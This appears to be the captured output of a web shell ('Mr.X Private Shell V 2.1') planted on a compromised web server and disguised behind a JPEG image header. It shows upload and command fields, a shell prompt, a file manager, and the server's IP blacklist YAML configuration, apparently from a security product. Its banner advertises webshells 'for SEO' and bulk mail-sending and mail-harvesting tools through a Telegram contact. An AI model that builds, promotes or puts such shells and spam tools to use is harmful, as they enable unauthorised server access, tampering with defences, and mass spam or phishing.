����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
blacklist ip list:
  help: List item(-s) in IP Black List
  cli:
    users:
      - root
  type: dict
  schema:
    by_ip:
      type: string
      nullable: true

    by_country_code:
      type: string
      nullable: true

    by_comment:
      type: string
      nullable: true
      empty: false

    manual:
      type: boolean
      nullable: true

    limit:
      type: integer
      coerce: int
      default: 50
    offset:
      type: integer
      coerce: int
      default: 0

blacklist ip delete:
  help: Remove item(-s) from IP Black List
  return_type: NoItemsAgentResponse
  cli:
    users:
      - root
  type: dict
  schema:
    items:
      type: list
      schema:
        type: ip
        coerce: ip
        check_with:
          - enforce64min_subnet_mask_for_ipv6
      required: true
      positional: true

blacklist ip add:
  help: Add item(-s) to IP Black List
  return_type: NoItemsAgentResponse
  cli:
    users:
      - root
  type: dict
  schema:
    items:
      type: list
      schema:
        type: ip
        coerce: ip
        check_with:
          - enforce64min_subnet_mask_for_ipv6
      required: true
      positional: true
    comment:
      type: string
    expiration:
      help: allows specifying expiration time for the listed IP (in seconds since epoch)
      type: integer
      default: 0
      check_with:
        - expiration
      coerce: int
    scope:
      type: string
      default: local
      allowed:
        - local
        - group
    client_addr:
      type: ip
      nullable: true
      default: null

blacklist ip move:
  help: Move item(-s) to IP Black List
  return_type: NoItemsAgentResponse
  cli:
    users:
      - root
  type: dict
  schema:
    items:
      type: list
      schema:
        type: ip
        coerce: ip
        check_with:
          - enforce64min_subnet_mask_for_ipv6
      required: true
      positional: true

blacklist ip edit:
  help: Edit comment on item in the IP Black List
  return_type: NoItemsAgentResponse
  cli:
    users:
      - root
  type: dict
  schema:
    items:
      type: list
      schema:
        type: ip
        coerce: ip
        check_with:
          - enforce64min_subnet_mask_for_ipv6
      required: true
      positional: true
    comment:
      type: string
    expiration:
      help: allows specifying expiration time for the listed IP (in seconds since epoch)
      type: integer
      coerce: int
      check_with:
        - expiration
    scope:
      type: string
      allowed:
        - local
        - group

Filemanager

Name Type Size Permission Actions
black.pickle File 2.17 KB 0644
black.yaml File 2.49 KB 0644
gray.pickle File 1.57 KB 0644
gray.yaml File 1.79 KB 0644
white.pickle File 2.45 KB 0644
white.yaml File 2.82 KB 0644